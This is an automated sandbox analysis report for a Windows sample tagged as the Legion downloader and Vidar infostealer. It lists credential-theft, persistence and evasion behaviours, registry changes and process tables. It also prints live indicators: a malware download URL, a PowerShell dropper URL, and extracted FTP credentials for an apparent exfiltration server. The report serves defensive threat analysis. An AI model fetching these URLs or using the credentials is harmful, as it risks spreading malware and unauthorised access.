legion | hxxp://mynevainstall[.]org/eupanda[.]exe

Analysis

max time kernel
149s
max time network
150s
resource
win10v191014
submitted
16-12-2019 13:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://mynevainstall.org/eupanda.exe

Score

10^/10

downloader legion spyware persistence discovery stealer vidar

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://legion17.top/legion17/welcome

Extracted

Credentials

Protocol: ftp
Host:
45.81.235.3
Port:
21
Username:
unser_server.118273
Password:
PHST6112002002

Signatures

Legion
Legion is a malware downloader written in C++.
downloader legion

Legion downloader 2 IoCs

Detected Legion downloader HTTP request code and PowerShell execution.

downloader

resource	yara_rule
task1/files/0x0002000000015628-10.dat	legion_downloader
task1/files/0x0002000000015628-11.dat	legion_downloader

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 4240 created 3680	4240	svchost.exe	86
PID 4240 created 1968	4240	svchost.exe	93
PID 4240 created 5116	4240	svchost.exe	115

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Executes dropped EXE 25 IoCs

pid	Process
3940	eupanda.exe
4436	eupanda.tmp
4644	postback.EXE
3712	slhost2.exe
1672	slhost2.exe
1968	E9BZLP6Q0N.exe
2436	FX073BL9N1.exe
1804	dll.exe
4576	ir50_qcxoriginal.exe
5116	5YXS.exe
3400	wship6.exe
4528	wship6.exe
816	wship6.exe
912	wship6.exe
1880	wship6.exe
4352	wship6.exe
5012	wship6.exe
5016	wship6.exe
320	wship6.exe
4252	wship6.exe
3364	wship6.exe
2496	wship6.exe
4652	ir50_qcxoriginal.exe
4612	wship6.exe
2684	wship6.exe

Loads dropped DLL 4 IoCs

pid	Process
4436	eupanda.tmp
4436	eupanda.tmp
1672	slhost2.exe
1672	slhost2.exe

Modifies file permissions 1 TTPs 5 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5016	icacls.exe
5044	icacls.exe
4964	icacls.exe
2488	icacls.exe
2608	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Windows\CurrentVersion\Run\{VLUVX5IB-VH3O-V55H-LS2K-LOBMHNF2I1F7} = "C:\\ProgramData\\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\\5YXS.exe"	dll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\{VLUVX5IB-VH3O-V55H-LS2K-LOBMHNF2I1F7} = "C:\\ProgramData\\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\\5YXS.exe"	dll.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

JavaScript code in executable 1 IoCs

resource	yara_rule
task1/files/0x000100000001b031-76.dat	js

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
47	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\WinMgmts:\	ir50_qcxoriginal.exe
File opened for modification	C:\Windows\SysWOW64\WinMgmts:\	ir50_qcxoriginal.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BITS\Performance	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch2	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\BITS Writer	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
3712	slhost2.exe
1672	slhost2.exe
1672	slhost2.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3712 set thread context of 1672	3712	slhost2.exe	91

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	svchost.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
3736	3680	WerFault.exe	86
2144	1968	WerFault.exe	93
4880	5116	WerFault.exe	115

Checks processor information in registry 2 TTPs 11 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	slhost2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	slhost2.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4972	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5044	taskkill.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 4c6bfe76f785d501	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3924954792"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c36c9cdac63c12448d84f1a7215689fa000000000200000000001066000000010000200000004ab5d78c33848ec926cdb23f8903023c13c0c37beb8229cf055407cdf3e7ed37000000000e8000000002000020000000a4da1718343ce12fe1920d2565f5e04122c0735c0c3c94f6eb244a463831f2aa200000002e04dce9285f4531bd48ac49181e79daa23c32fc8ccd16b4689d527d0002646f40000000ed7fad1b4d705ce03e724b48082e96493d828c45aaedac872009753cc5a235f2df88c691f666b0e820d24be9028daaed793259f832bbc299f71fe9ea82ef5a81	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003c000000900300001c020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{1EF07D87-31BB-4EAF-8B92-C2AF6C6386E7}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30782492"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30782492"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c36c9cdac63c12448d84f1a7215689fa000000000200000000001066000000010000200000007eff8dfb71d3943d6ecb2782ba1c25978f5a2b5a7e25a2e3156e21cc70498886000000000e8000000002000020000000d9c9adec381a0421a807e2f9df70789670fef46d829702a2f93db62b5083cd302000000099a63e272b298143f328eafceb964e3e4e53a7cfb7ce9abb43902de275ba28a74000000006d2f517e3057b18b9eee07af678f7c2b976864cb3dcce467f93e5d891d17cd0acdb4faa3b2a1b7e841649ca4c1f93bfa598c8cf844732558e9f8a7e477c11c0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 206eaaf11cb4d501	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{153400D0-2010-11EA-BD7F-FE51693A2DE0} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50d130f11cb4d501	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30782492"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3924954792"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3996049022"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe

Modifies data under HKEY_USERS 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\15\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\E9BZLP6Q0N.exe:Zone.Identifier	slhost2.exe
File created	C:\ProgramData\FX073BL9N1.exe:Zone.Identifier	slhost2.exe
File opened for modification	C:\ProgramData\FX073BL9N1.exe:Zone.Identifier	slhost2.exe
File opened for modification	C:\\WinMgmts:\	FX073BL9N1.exe
File created	C:\ProgramData\{H9RQXYGC-73OT-FRPV-FGZO-5AVRNE0OI6L8}\5YXS.exe:Zone.Identifier	dll.exe
File created	C:\ProgramData\E9BZLP6Q0N.exe:Zone.Identifier	slhost2.exe

Suspicious behavior: EnumeratesProcesses 523 IoCs

pid	Process
4436	eupanda.tmp
4436	eupanda.tmp
4644	postback.EXE
4644	postback.EXE
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
3736	WerFault.exe
4240	svchost.exe
4240	svchost.exe
1672	slhost2.exe
1672	slhost2.exe
1672	slhost2.exe
1672	slhost2.exe
1672	slhost2.exe
1672	slhost2.exe
1672	slhost2.exe
1672	slhost2.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
4240	svchost.exe
4240	svchost.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
3400	wship6.exe
3400	wship6.exe
3400	wship6.exe
3400	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4528	wship6.exe
4528	wship6.exe
4528	wship6.exe
4528	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
816	wship6.exe
816	wship6.exe
816	wship6.exe
816	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
912	wship6.exe
912	wship6.exe
912	wship6.exe
912	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
1880	wship6.exe
1880	wship6.exe
1880	wship6.exe
1880	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4352	wship6.exe
4352	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4352	wship6.exe
4352	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
5012	wship6.exe
5012	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
5012	wship6.exe
5012	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
5016	wship6.exe
5016	wship6.exe
5016	wship6.exe
5016	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4240	svchost.exe
4240	svchost.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
320	wship6.exe
320	wship6.exe
320	wship6.exe
320	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4252	wship6.exe
4252	wship6.exe
4252	wship6.exe
4252	wship6.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
4576	ir50_qcxoriginal.exe
